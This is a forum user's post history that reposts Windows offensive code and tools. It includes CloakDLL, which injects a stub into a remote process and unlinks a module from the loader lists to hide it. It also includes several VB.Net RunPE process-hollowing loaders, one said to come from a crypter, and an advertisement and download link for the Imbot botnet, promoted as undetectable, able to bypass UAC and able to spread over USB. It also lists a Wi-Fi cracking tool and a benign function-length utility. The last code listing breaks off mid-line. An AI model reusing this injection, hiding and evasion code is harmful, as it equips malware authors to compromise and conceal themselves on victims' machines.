Jump to content

Nytro

Administrators
  • Posts

    18732
  • Joined

  • Last visited

  • Days Won

    710

Everything posted by Nytro

  1. [sRC] Length of Function FuncLen.cpp #include <windows.h> #include <stdio.h> #include <vector> #include <iterator> #include <algorithm> #include "types.h" #include "FuncLen.h" /************************************************************************ Function length calculation algorithm - by Darawk: 1. Scan the function's code for branches, and record each branch. Stop upon reaching an end-point*. This group of instructions constitutes the current "block". 2. QSort the branch list 3. Recursively repeat steps 1 & 2 with each branch, skipping duplicates and intra-block branches. *end-point: A ret instruction or an unconditional backwards jump, that jumps to a previous block. ************************************************************************/ int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { u32 len = GetFunctionLength(GetProcAddress(GetModuleHandle(moduleName), funcName)); char buf[256] = {0}; sprintf(buf, "%s in %s: %u bytes long", funcName, moduleName, len); MessageBox(NULL, buf, "Function Length", NULL); return 0; } u32 GetFunctionLength(void *begin) { void *end = GetFunctionEnd(begin); u32 delta = (u32)((DWORD_PTR)end - (DWORD_PTR)begin); delta += mlde32(end); return delta; } void *GetFunctionEnd(void *func) { void *block = func; vector<void *> branchList; // ptr now points to the end of this block void *blockend = GetBranchListFromBlock(block, branchList); // If there are no branches, then return // the empty list. If we don't have this // here the loop will crash on an empty // branch list. if(branchList.size() == 0) return blockend; // Sort the list so that we can identify and // discard, intra-block branches. And optimize // the removal of duplicates. std::sort(branchList.begin(), branchList.end()); void *prev = NULL; vector<void *>::iterator branch; for(branch = branchList.begin(); branch != branchList.end(); branch++) { // Skip branches that jump into a block we've already // processed. if(*branch < blockend || *branch == prev) continue; blockend = GetFunctionEnd(*branch); prev = *branch; } return blockend; } void *GetBranchListFromBlock(void *block, vector<void *> &branchList) { u8 *ptr = (u8 *)block; // If we reach an end-point, then this block is complete while(!IsEndPoint(ptr, block)) { // Record all branching instructions that we encounter void *address = GetBranchAddress(ptr); if(address) { branchList.push_back(address); } // Next instruction ptr += mlde32(ptr); } return ptr; } void *GetBranchAddress(u8 *instr) { s32 offset = 0; // This code will determine what type of branch it is, and // determine the address it will branch to. switch(*instr) { case INSTR_SHORTJMP: case INSTR_RELJCX: offset = (s32)(*(s8 *)(instr + 1)); offset += 2; break; case INSTR_RELJMP: offset = *(s32 *)(instr + 1); offset += 5; break; case INSTR_NEAR_PREFIX: if(*(instr + 1) >= INSTR_NEARJCC_BEGIN && *(instr + 1) <= INSTR_NEARJCC_END) { offset = *(s32 *)(instr + 2); offset += 5; } break; default: // Check to see if it's in the valid range of JCC values. // e.g. ja, je, jne, jb, etc.. if(*instr >= INSTR_SHORTJCC_BEGIN && *instr <= INSTR_SHORTJCC_END) { offset = (s32)*((s8 *)(instr + 1)); offset += 2; } break; } if(offset == 0) return NULL; return instr + offset; } bool IsEndPoint(u8 *instr, void *curblock) { void *address; s32 offset; switch(*instr) { case INSTR_RET: case INSTR_RETN: case INSTR_RETFN: case INSTR_RETF: return true; break; // The following two checks, look for an instance in which // an unconditional jump returns us to a previous block, // thus creating a pseudo-endpoint. case INSTR_SHORTJMP: offset = (s32)(*(s8 *)(instr + 1)); address = instr + offset; if(address <= curblock) return true; break; case INSTR_RELJMP: offset = *(s32 *)(instr + 1); address = instr + offset; if(address <= curblock) return true; break; default: return false; break; } return false; } FuncLen.h using namespace std; u32 GetFunctionLength(void *begin); bool IsEndPoint(u8 *instr, void *curblock); void *FindEndPoint(void *block); void *GetBranchAddress(u8 *instr); void *GetNextBlock(u8 *instr, void *curBlockEnd); void *GetFunctionEnd(void *func); void ConsolidateBlocks(vector<void *> &blocks); void *GetBranchListFromBlock(void *block, vector<void *> &branchList); char funcName[] = "WinExec"; char moduleName[] = "kernel32.dll"; extern "C" int __cdecl mlde32(void *codeptr); #define INSTR_NEAR_PREFIX 0x0F #define INSTR_SHORTJCC_BEGIN 0x70 #define INSTR_SHORTJCC_END 0x7F #define INSTR_NEARJCC_BEGIN 0x80 // Near's are prefixed with a 0x0F byte #define INSTR_NEARJCC_END 0x8F #define INSTR_RET 0xC2 #define INSTR_RETN 0xC3 #define INSTR_RETFN 0xCA #define INSTR_RETF 0xCB #define INSTR_RELJCX 0xE3 #define INSTR_RELJMP 0xE9 #define INSTR_SHORTJMP 0xEB mlde32.obj is included in archieve or from download //www.darawk.com/code/FuncLen/ Download (cu cont, atasament): http://www.ic0de.org/showthread.php?10442-SRC-Length-of-Function
  2. [sRC] CloakDLL - Hide modules from winapi CloakDll.cpp // CloakDll - by Darawk // // The purpose of CloakDll is to allow the user to hide any loaded // module from the windows API. It works by accessing the modules // list stored in the PEB, and subsequently unlinking the module // in question from all 4 of the doubly-linked lists that it's a // node of. It then zeroes out the structure and the path/file // name of the module in memory. So that even if the memory where // the data about this module used to reside is scanned there will // still be no conclusive evidence of it's existence. At present // there is only one weakness that I have found in this method. // I'll describe how it may still be possible to discover at least // that a module has been hidden, after a brief introduction to how // the GetModuleHandle function works. // // *The following information is not documented by Microsoft. This // information consists of my findings while reverse-engineering // these functions and some of them may be incorrect and/or // subject to change at any time(and is almost definitely different // in different versions of windows, and maybe even in different // service packs). I've tried to make my code as version independant // as possible but certain parts of it may not work on older versions // of windows. I've tested it on XP SP2 and there i'll guarantee // that it works, but on any other versions of windows, it's anyone's // guess.* // // GetModuleHandle eventually calls GetModuleHandleExW, which in // turn accesses the native API function GetDllHandle, which calls // GetDllHandleEx. And it's not until here, that we actually see // anything even begin to look up information about loaded modules. // Whenever GetModuleHandle is called, it saves the address of the // last ModuleInfoNode structure that it found in a global variable // inside of ntdll. This global variable is the first thing // checked on all subsequent calls to GetModuleHandle. If the // handle being requested is not the one that was requested the last // time GetDllHandleEx calls the LdrpCheckForLoadedDll function. // LdrpCheckForLoadedDll begins by converting the first letter of the // module name being requested to uppercase, decrementing it by 1 and // AND'ing it with 0x1F. This effectively creates a 0-based index // beginning with the letter 'A'. The purpose of this is so that // the module can first be looked up in a hash table. The hash table // consists entirely of LIST_ENTRY structures. One for each letter // 'A' through 'Z'. The LIST_ENTRY structure points to the first // and last modules loaded that begin with the letter assigned to // that entry in the hash table. The Flink member being the first // loaded beginning with that letter, and the Blink member being the // last. The code scans through this list until it finds the module // that it's looking for. On the off-chance that it doesn't find it // there, or if the boolean argument UseLdrpHashTable is set to false // it will begin going through one of the other three lists. If, at // this point it still doesn't find it, it will admit defeat and return // 0 for the module handle. // // Weakness: The global variable inside ntdll that caches the pointer // to the last module looked up could be used to at least detect the // fact that a module has been hidden. The LdrUnloadDll() function // will set this value to 0 when it unloads a module, so if the cache // variable points to an empty structure, the only logical conclusion // would be a hidden module somewhere in the process. This could be // resolved by using the static address of this variable and simply // zeroing it out. However, this would make the code specific to only // one version of windows. You could also scan the address space of // ntdll for any occurences of the base address(aka module handle) // of the module you're hiding. However, this would be slow and it // would clutter up the CloakDll_stub function, because it'd have to // all be done manually. And i'd have to either use a static base // address for ntdll...which would probably work on most versions // of windows, however I really don't like using static addresses. // Or i'd have to manually locate it by writing my own unicode // string comparison code, to lookup ntdll in the list by it's name. // Realistically though anyone trying to detect this way would run // into the same problem. That their code would not be version // independant. So, it's unlikely to see any largescale deployment // of such a technique. However, anyone who would like to solve // this problem themselves is perfectly free, and encouraged to do // so. #include <windows.h> #include <winnt.h> #include <tlhelp32.h> #include <shlwapi.h> #pragma comment(lib, "shlwapi.lib") #define UPPERCASE(x) if((x) >= 'a' && (x) <= 'z') (x) -= 'a' - 'A' #define UNLINK(x) (x).Blink->Flink = (x).Flink; \ (x).Flink->Blink = (x).Blink; #pragma pack(push, 1) typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; typedef struct _ModuleInfoNode { LIST_ENTRY LoadOrder; LIST_ENTRY InitOrder; LIST_ENTRY MemoryOrder; HMODULE baseAddress; // Base address AKA module handle unsigned long entryPoint; unsigned int size; // Size of the modules image UNICODE_STRING fullPath; UNICODE_STRING name; unsigned long flags; unsigned short LoadCount; unsigned short TlsIndex; LIST_ENTRY HashTable; // A linked list of any other modules that have the same first letter unsigned long timestamp; } ModuleInfoNode, *pModuleInfoNode; typedef struct _ProcessModuleInfo { unsigned int size; // Size of a ModuleInfo node? unsigned int initialized; HANDLE SsHandle; LIST_ENTRY LoadOrder; LIST_ENTRY InitOrder; LIST_ENTRY MemoryOrder; } ProcessModuleInfo, *pProcessModuleInfo; #pragma pack(pop) bool CloakDll_stub(HMODULE); void CD_stubend(); bool CloakDll(char *, char *); unsigned long GetProcessIdFromProcname(char *); HMODULE GetRemoteModuleHandle(unsigned long, char *); int main(int argc, char **argv) { CloakDll("notepad.exe", "kernel32.dll"); return 0; } bool CloakDll(char *process, char *dllName) { PathStripPath(dllName); unsigned long procId; procId = GetProcessIdFromProcname(process); HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procId); // Calculate the length of the stub by subtracting it's address // from the beginning of the function directly ahead of it. // // NOTE: If the compiler compiles the functions in a different // order than they appear in the code, this will not work as // it's supposed to. However, most compilers won't do that. unsigned int stubLen = (unsigned long)CD_stubend - (unsigned long)CloakDll_stub; // Allocate space for the CloakDll_stub function void *stubAddress = VirtualAllocEx(hProcess, NULL, stubLen, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); // Write the stub's code to the page we allocated for it WriteProcessMemory(hProcess, stubAddress, CloakDll_stub, stubLen, NULL); HMODULE hMod = GetRemoteModuleHandle(procId, dllName); // Create a thread in the remote process to execute our code CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)stubAddress, hMod, 0, NULL); // Clean up after ourselves, so as to leave as little impact as possible // on the remote process VirtualFreeEx(hProcess, stubAddress, stubLen, MEM_RELEASE); return true; } bool CloakDll_stub(HMODULE hMod) { ProcessModuleInfo *pmInfo; ModuleInfoNode *module; _asm { mov eax, fs:[18h] // TEB mov eax, [eax + 30h] // PEB mov eax, [eax + 0Ch] // PROCESS_MODULE_INFO mov pmInfo, eax } module = (ModuleInfoNode *)(pmInfo->LoadOrder.Flink); while(module->baseAddress && module->baseAddress != hMod) module = (ModuleInfoNode *)(module->LoadOrder.Flink); if(!module->baseAddress) return false; // Remove the module entry from the list here /////////////////////////////////////////////////// // Unlink from the load order list UNLINK(module->LoadOrder); // Unlink from the init order list UNLINK(module->InitOrder); // Unlink from the memory order list UNLINK(module->MemoryOrder); // Unlink from the hash table UNLINK(module->HashTable); // Erase all traces that it was ever there /////////////////////////////////////////////////// // This code will pretty much always be optimized into a rep stosb/stosd pair // so it shouldn't cause problems for relocation. // Zero out the module name memset(module->fullPath.Buffer, 0, module->fullPath.Length); // Zero out the memory of this module's node memset(module, 0, sizeof(ModuleInfoNode)); return true; } __declspec(naked) void CD_stubend() { } unsigned long GetProcessIdFromProcname(char *procName) { PROCESSENTRY32 pe; HANDLE thSnapshot; BOOL retval, ProcFound = false; thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(thSnapshot == INVALID_HANDLE_VALUE) { MessageBox(NULL, "Error: unable to create toolhelp snapshot", "Loader", NULL); return false; } pe.dwSize = sizeof(PROCESSENTRY32); retval = Process32First(thSnapshot, &pe); while(retval) { if(StrStrI(pe.szExeFile, procName) ) { ProcFound = true; break; } retval = Process32Next(thSnapshot,&pe); pe.dwSize = sizeof(PROCESSENTRY32); } return pe.th32ProcessID; } HMODULE GetRemoteModuleHandle(unsigned long pId, char *module) { MODULEENTRY32 modEntry; HANDLE tlh = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pId); modEntry.dwSize = sizeof(MODULEENTRY32); Module32First(tlh, &modEntry); do { if(!stricmp(modEntry.szModule, module)) return modEntry.hModule; modEntry.dwSize = sizeof(MODULEENTRY32); } while(Module32Next(tlh, &modEntry)); return NULL; } Sursa: ic0de.org
  3. Nytro

    Imbot V5.3

    Imbot V5.3 + Support for all Windows systems (Including Seven and startup for Windows Vista) + Bypass UAC of Windows Vista and Windows seven (do not simply pass off without being seen) + Command to open in a web browser of choice (syntax. <web> Navigate) USB + Spread FUD (Undetectable) * Improved organizational system nicks and identification. Download: http://www.opensc.ws/attachments/bots-rootkits/4896d1290833381-imbot-v5-3-imbot-v5.3.rar Sursa: Imbot V5.3
  4. Wifi Cracker 1.5 - Linux Fern Wifi Cracker 1.5 is available, download fern 1.2 then update to 1.5 by using the update download button This is a wireless security auditing application that is written in python and uses python-qt4. This application uses the aircrack-ng suite of tools. It should work on any version of linux running the following: Requirements: python python-qt4 macchanger aircrack-ng xterm subversion To install simply run the following command in terminal after changing directory to the path were the downloaded package is: root@host:~# dpkg -i Fern-Wifi-Cracker_1.2_all.deb Download: http://code.google.com/p/fern-wifi-cracker/downloads/list Sursa: http://www.hackhound.org/forum/index.php?/topic/39379-wifi-cracker-15-linux/
  5. [VB.Net] RunPe's Reflection RunPe Credits: Deathader Imports System Imports System.Windows.Forms Imports System.Reflection Imports System.IO Imports System.Runtime.CompilerServices Private Function ReadExeFromFile(ByVal filename As String) As Byte() Dim fs As New FileStream(filename, FileMode.Open, FileAccess.Read) Dim exeData As Byte() = New Byte(fs.Length - 1) {} fs.Read(exeData, 0, System.Convert.ToInt32(fs.Length)) fs.Close() Return exeData End Function Private Function ReadExeFromResources(ByVal filename As String) As Byte() Dim CurrentAssembly As Reflection.Assembly = Reflection.Assembly.GetExecutingAssembly() Dim Resource As String = String.Empty Dim ArrResources As String() = CurrentAssembly.GetManifestResourceNames() For Each Resource In ArrResources If Resource.IndexOf(filename) > -1 Then _ Exit For Next Dim ResourceStream As IO.Stream = CurrentAssembly.GetManifestResourceStream(Resource) If ResourceStream Is Nothing Then Return Nothing End If Dim ResourcesBuffer(CInt(ResourceStream.Length) - 1) As Byte ResourceStream.Read(ResourcesBuffer, 0, ResourcesBuffer.Length) ResourceStream.Close() Return ResourcesBuffer End Function Private Function StringToByteArray(ByVal str As String) As Byte() Dim encoding As New System.Text.ASCIIEncoding() Return encoding.GetBytes(str) End Function Private Sub RunFromMemory(ByVal bytes As Byte()) Dim assembly As Assembly = assembly.Load(bytes) Dim entryPoint As MethodInfo = [assembly].EntryPoint Dim objectValue As Object = RuntimeHelpers.GetObjectValue([assembly].CreateInstance(entryPoint.Name)) entryPoint.Invoke(RuntimeHelpers.GetObjectValue(objectValue), New Object() {New String() {"1"}}) End Sub USAGE: Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click Dim x As New Threading.Thread(AddressOf RunFromMemory) x.Start(ReadExeFromResources("EmbeddedExe.exe")) End Sub T0fx Pe & JapaBrz PE t0fx RunPe[used in Moon Crypter] [CODE]Class RunPE Public Const PAGE_NOCACHE As Long = &H200 Public Const PAGE_EXECUTE_READWRITE As Long = &H40 Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80 Public Const PAGE_EXECUTE_READ As Long = &H20 Public Const PAGE_EXECUTE As Long = &H10 Public Const PAGE_WRITECOPY As Long = &H8 Public Const PAGE_NOACCESS As Long = &H1 Public Const PAGE_READWRITE As Long = &H4 Public Const PAGE_READONLY As System.UInt32 = &H2 Shared Sub Execute(ByVal data() As Byte, ByVal target As String) Dim C = New H.Context, SH As H.Section_Header, PI = New H.Process_Information, SI = New H.Startup_Information, PS = New H.Security_Flags, TS = New H.Security_Flags Dim GC = System.Runtime.InteropServices.GCHandle.Alloc(data, System.Runtime.InteropServices.GCHandleType.Pinned) Dim Buffer As Integer = GC.AddrOfPinnedObject.ToInt32 Dim DH As New H.DOS_Header DH = System.Runtime.InteropServices.Marshal.PtrToStructure(GC.AddrOfPinnedObject, DH.GetType) GC.Free() If H.CreateProcess(Nothing, target, PS, TS, False, 4, Nothing, Nothing, SI, PI) = 0 Then Return Dim NH As New H.NT_Headers NH = System.Runtime.InteropServices.Marshal.PtrToStructure(New System.IntPtr(Buffer + DH.Address), NH.GetType) Dim Address, Offset As Long, ret As UInteger SI.CB = Len(SI) C.Flags = 65538 If NH.Signature <> 17744 Or DH.Magic <> 23117 Then Return If H.GetThreadContext(PI.Thread, C) And H.ReadProcessMemory(PI.Process, C.Ebx + 8, Address, 4, 0) >= 0 And H.ZwUnmapViewOfSection(PI.Process, Address) >= 0 Then Dim ImageBase As System.UInt32 = H.VirtualAllocEx(PI.Process, NH.Optional.Image, NH.Optional.SImage, 12288, 4) If ImageBase <> 0 Then H.WriteProcessMemory(PI.Process, ImageBase, data, NH.Optional.SHeaders, ret) Offset = DH.Address + 248 For I As Integer = 0 To NH.File.Sections - 1 SH = System.Runtime.InteropServices.Marshal.PtrToStructure(New System.IntPtr(Buffer + Offset + I * 40), SH.GetType) Dim Raw(SH.Size) As Byte For Y As Integer = 0 To SH.Size - 1 : Raw(Y) = data(SH.Pointer + Y) : Next H.WriteProcessMemory(PI.Process, ImageBase + SH.Address, Raw, SH.Size, ret) H.VirtualProtectEx(PI.Process, ImageBase + SH.Address, SH.Misc.Size, Protect(SH.Flags), Address) Next I Dim T = BitConverter.GetBytes(ImageBase) H.WriteProcessMemory(PI.Process, C.Ebx + 8, T, 4, ret) C.Eax = ImageBase + NH.Optional.Address H.SetThreadContext(PI.Thread, C) H.ResumeThread(PI.Thread) End If End If End Sub Public Shared Function RShift(ByVal lValue As Long, ByVal lNumberOfBitsToShift As Long) As Long RShift = vbLongToULong(lValue) / (2 ^ lNumberOfBitsToShift) End Function Public Shared Function vbLongToULong(ByVal Value As Long) As Double Const OFFSET_4 = 4294967296.0# If Value < 0 Then vbLongToULong = Value + OFFSET_4 Else vbLongToULong = Value End If End Function Public Shared Function Protect(ByVal characteristics As Long) As Long Dim mapping() As Object = {PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, _ PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, _ PAGE_READWRITE, PAGE_EXECUTE_READWRITE} Protect = mapping(RShift(characteristics, 29)) End Function <System.ComponentModel.EditorBrowsable(1)> Friend Class H <System.Runtime.InteropServices.StructLayout(0)> Structure Context Dim Flags, D0, D1, D2, D3, D6, D7 As System.UInt32, Save As Save Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As System.UInt32 <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=512)> Dim Registers As Byte() End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure Save Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte() Dim State As System.UInt32 End Structure Structure Misc Dim Address, Size As System.UInt32 End Structure Structure Section_Header Dim Name As Byte, Misc As Misc, Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As System.UInt32 End Structure Structure Process_Information Dim Process, Thread As System.IntPtr, ProcessId, ThreadId As Integer End Structure <System.Runtime.InteropServices.StructLayout(0, CharSet:=3)> Structure Startup_Information Dim CB As Integer, ReservedA, Desktop, Title As String, X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer Dim ShowWindow, ReservedB As Short, ReservedC, Input, Output, [Error] As Integer End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure Security_Flags Dim Length As Integer, Descriptor As System.IntPtr, Inherit As Integer End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure DOS_Header Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As System.UInt16 <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=4)> Dim ReservedA As System.UInt16() Dim ID, Info As System.UInt16 <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=10)> Dim ReservedB As System.UInt16() Dim Address As System.Int32 End Structure Structure NT_Headers Dim Signature As System.UInt32, File As File_Header, [Optional] As Optional_Headers End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure File_Header Dim Machine, Sections As System.UInt16, Stamp, Table, Symbols As System.UInt32, Size, Flags As System.UInt16 End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure Optional_Headers Public Magic As System.UInt16, Major, Minor As Byte, SCode, IData, UData, Address, Code, Data, Image As System.UInt32, SectionA, FileA As System.UInt32 Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As System.UInt16, Version, SImage, SHeaders, Checksum As System.UInt32, Subsystem, Flags As System.UInt16 Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As System.UInt32 <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=16)> Public DataDirectory As Data_Directory() End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure Data_Directory Dim Address, Size As System.UInt32 End Structure Declare Auto Function CreateProcess Lib "kernel32" (ByVal name As String, ByVal command As String, ByRef process As Security_Flags, ByRef thread As Security_Flags, ByVal inherit As Boolean, ByVal flags As System.UInt32, ByVal system As System.IntPtr, ByVal current As String, <System.Runtime.InteropServices.In()> ByRef startup As Startup_Information, <System.Runtime.InteropServices.Out()> ByRef info As Process_Information) As Boolean Declare Auto Function WriteProcessMemory Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByVal buffer As Byte(), ByVal size As System.IntPtr, <System.Runtime.InteropServices.Out()> ByRef written As Integer) As Boolean Declare Auto Function ReadProcessMemory Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByRef buffer As System.IntPtr, ByVal size As System.IntPtr, ByRef read As Integer) As Integer Declare Auto Function VirtualProtectEx Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByVal size As System.UIntPtr, ByVal [new] As System.UIntPtr, <System.Runtime.InteropServices.Out()> ByVal old As System.UInt32) As Integer Declare Auto Function VirtualAllocEx Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByVal size As System.UInt32, ByVal type As System.UInt32, ByVal protect As System.UInt32) As System.IntPtr Declare Auto Function ZwUnmapViewOfSection Lib "ntdll" (ByVal process As System.IntPtr, ByVal address As System.IntPtr) As Long Declare Auto Function ResumeThread Lib "kernel32" (ByVal thread As System.IntPtr) As System.UInt32 Declare Auto Function GetThreadContext Lib "kernel32" (ByVal thread As System.IntPtr, ByRef context As Context) As Boolean Declare Auto Function SetThreadContext Lib "kernel32" (ByVal thread As System.IntPtr, ByRef context As Context) As Boolean End Class End Class JapaBrz RunPe 'Made by JapaBrz Imports System.Runtime.InteropServices Imports System.Text Class DD <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> _ Structure STARTUPINFO Public cb As Integer Public lpReserved As String Public lpDesktop As String Public lpTitle As String Public dwX As Integer Public dwY As Integer Public dwXSize As Integer Public dwYSize As Integer Public dwXCountChars As Integer Public dwYCountChars As Integer Public dwFillAttribute As Integer Public dwFlags As Integer Public wShowWindow As Short Public cbReserved2 As Short Public lpReserved2 As Integer Public hStdInput As Integer Public hStdOutput As Integer Public hStdError As Integer End Structure Private Structure PROCESS_INFORMATION Public hProcess As IntPtr Public hThread As IntPtr Public dwProcessId As Integer Public dwThreadId As Integer End Structure <StructLayout(LayoutKind.Sequential)> _ Private Structure IMAGE_DOS_HEADER Public e_magic As UInt16 ' Magic number Public e_cblp As UInt16 ' Bytes on last page of file Public e_cp As UInt16 ' Pages in file Public e_crlc As UInt16 ' Relocations Public e_cparhdr As UInt16 ' Size of header in paragraphs Public e_minalloc As UInt16 ' Minimum extra paragraphs needed Public e_maxalloc As UInt16 ' Maximum extra paragraphs needed Public e_ss As UInt16 ' Initial (relative) SS value Public e_sp As UInt16 ' Initial SP value Public e_csum As UInt16 ' Checksum Public e_ip As UInt16 ' Initial IP value Public e_cs As UInt16 ' Initial (relative) CS value Public e_lfarlc As UInt16 ' File address of relocation table Public e_ovno As UInt16 ' Overlay number <MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> _ Public e_res1 As UInt16() ' Reserved words Public e_oemid As UInt16 ' OEM identifier (for e_oeminfo) Public e_oeminfo As UInt16 ' OEM information; e_oemid specific <MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> _ Public e_res2 As UInt16() ' Reserved words Public e_lfanew As Int32 ' File address of new EXE header End Structure <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> _ Private Structure VS_VERSIONINFO Public wLength As UInt16 Public wValueLength As UInt16 Public wType As UInt16 <MarshalAs(UnmanagedType.ByValTStr, SizeConst:=15)> _ Public szKey As String Public Padding1 As UInt16 End Structure <StructLayout(LayoutKind.Sequential)> _ Structure SECURITY_ATTRIBUTES Public nLength As Integer Public lpSecurityDescriptor As IntPtr Public bInheritHandle As Integer End Structure <StructLayout(LayoutKind.Sequential)> _ Private Structure VS_FIXEDFILEINFO Public dwSignature As UInt32 Public dwStrucVersion As UInt32 Public dwFileVersionMS As UInt32 Public dwFileVersionLS As UInt32 Public dwProductVersionMS As UInt32 Public dwProductVersionLS As UInt32 Public dwFileFlagsMask As UInt32 Public dwFileFlags As UInt32 Public dwFileOS As UInt32 Public dwFileType As UInt32 Public dwFileSubtype As UInt32 Public dwFileDateMS As UInt32 Public dwFileDateLS As UInt32 End Structure <StructLayout(LayoutKind.Sequential)> _ Public Structure FLOATING_SAVE_AREA Public ControlWord As UInteger Public StatusWord As UInteger Public TagWord As UInteger Public ErrorOffset As UInteger Public ErrorSelector As UInteger Public DataOffset As UInteger Public DataSelector As UInteger <MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> _ Public RegisterArea As Byte() Public Cr0NpxState As UInteger End Structure <StructLayout(LayoutKind.Sequential)> _ Public Structure CONTEXT Public ContextFlags As UInteger 'set this to an appropriate value ' Retrieved by CONTEXT_DEBUG_REGISTERS Public Dr0 As UInteger Public Dr1 As UInteger Public Dr2 As UInteger Public Dr3 As UInteger Public Dr6 As UInteger Public Dr7 As UInteger ' Retrieved by CONTEXT_FLOATING_POINT Public FloatSave As FLOATING_SAVE_AREA ' Retrieved by CONTEXT_SEGMENTS Public SegGs As UInteger Public SegFs As UInteger Public SegEs As UInteger Public SegDs As UInteger ' Retrieved by CONTEXT_INTEGER Public Edi As UInteger Public Esi As UInteger Public Ebx As UInteger Public Edx As UInteger Public Ecx As UInteger Public Eax As UInteger ' Retrieved by CONTEXT_CONTROL Public Ebp As UInteger Public Eip As UInteger Public SegCs As UInteger Public EFlags As UInteger Public Esp As UInteger Public SegSs As UInteger ' Retrieved by CONTEXT_EXTENDED_REGISTERS <MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> _ Public ExtendedRegisters As Byte() End Structure <StructLayout(LayoutKind.Sequential)> _ Public Structure IMAGE_OPTIONAL_HEADER32 ' ' Standard fields. ' Public Magic As UInt16 Public MajorLinkerVersion As [Byte] Public MinorLinkerVersion As [Byte] Public SizeOfCode As UInt32 Public SizeOfInitializedData As UInt32 Public SizeOfUninitializedData As UInt32 Public AddressOfEntryPoint As UInt32 Public BaseOfCode As UInt32 Public BaseOfData As UInt32 ' ' NT additional fields. ' Public ImageBase As UInt32 Public SectionAlignment As UInt32 Public FileAlignment As UInt32 Public MajorOperatingSystemVersion As UInt16 Public MinorOperatingSystemVersion As UInt16 Public MajorImageVersion As UInt16 Public MinorImageVersion As UInt16 Public MajorSubsystemVersion As UInt16 Public MinorSubsystemVersion As UInt16 Public Win32VersionValue As UInt32 Public SizeOfImage As UInt32 Public SizeOfHeaders As UInt32 Public CheckSum As UInt32 Public Subsystem As UInt16 Public DllCharacteristics As UInt16 Public SizeOfStackReserve As UInt32 Public SizeOfStackCommit As UInt32 Public SizeOfHeapReserve As UInt32 Public SizeOfHeapCommit As UInt32 Public LoaderFlags As UInt32 Public NumberOfRvaAndSizes As UInt32 <MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> _ Public DataDirectory As IMAGE_DATA_DIRECTORY() End Structure <StructLayout(LayoutKind.Sequential)> _ Public Structure IMAGE_FILE_HEADER Public Machine As UInt16 Public NumberOfSections As UInt16 Public TimeDateStamp As UInt32 Public PointerToSymbolTable As UInt32 Public NumberOfSymbols As UInt32 Public SizeOfOptionalHeader As UInt16 Public Characteristics As UInt16 End Structure <StructLayout(LayoutKind.Sequential)> _ Public Structure IMAGE_DATA_DIRECTORY Public VirtualAddress As UInt32 Public Size As UInt32 End Structure Public Structure IMAGE_NT_HEADERS Public Signature As UInt32 Public FileHeader As IMAGE_FILE_HEADER Public OptionalHeader As IMAGE_OPTIONAL_HEADER32 End Structure Public Enum IMAGE_SIZEOF_SHORT_NAME IMAGE_SIZEOF_SHORT_NAME = 8 End Enum Public Structure Misc Public PhysicalAddress As System.UInt32 Public VirtualSize As System.UInt32 End Structure Public Structure IMAGE_SECTION_HEADER Public Name As System.Byte Public Misc As Misc Public VirtualAddress As System.UInt32 Public SizeOfRawData As System.UInt32 Public PointerToRawData As System.UInt32 Public PointerToRelocations As System.UInt32 Public PointerToLinenumbers As System.UInt32 Public NumberOfRelocations As System.UInt16 Public NumberOfLinenumbers As System.UInt16 Public Characteristics As System.UInt32 End Structure Public Const CONTEXT_X86 = &H10000 Public Const CONTEXT86_CONTROL = (CONTEXT_X86 Or &H1) 'SS:SP, CS:IP, FLAGS, BP Public Const CONTEXT86_INTEGER = (CONTEXT_X86 Or &H2) 'AX, BX, CX, DX, SI, DI Public Const CONTEXT86_SEGMENTS = (CONTEXT_X86 Or &H4) 'DS, ES, FS, GS Public Const CONTEXT86_FLOATING_POINT = (CONTEXT_X86 Or &H8) '387 state Public Const CONTEXT86_DEBUG_REGISTERS = (CONTEXT_X86 Or 